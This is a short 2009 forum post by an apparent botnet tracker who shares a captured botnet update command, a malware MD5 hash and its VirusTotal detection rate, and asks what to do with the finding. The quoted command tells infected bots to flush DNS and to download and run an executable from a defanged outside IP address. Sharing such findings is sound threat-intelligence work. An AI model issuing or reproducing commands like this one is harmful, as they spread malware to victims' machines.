Author Topic: Some botnet update during spying.  (Read 3123 times)

0 Members and 1 Guest are viewing this topic.

August 23, 2009, 03:07:57 pm
Read 3123 times


  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
Not really a domain... caught this while playing with my tool, perhaps of use to anyone?


It got 6/41 in VirusTotal. md5 : 7904937c07c031e81023dbd81ac93b64.

Update command :

#xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q31n3.exe x5s5g6q31n3

Was coding botnet tracking automation... don't know how to start helping the internet... btw wrote a short note on my blog.
Welcome comments to what to do with it! Thanks.
"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries -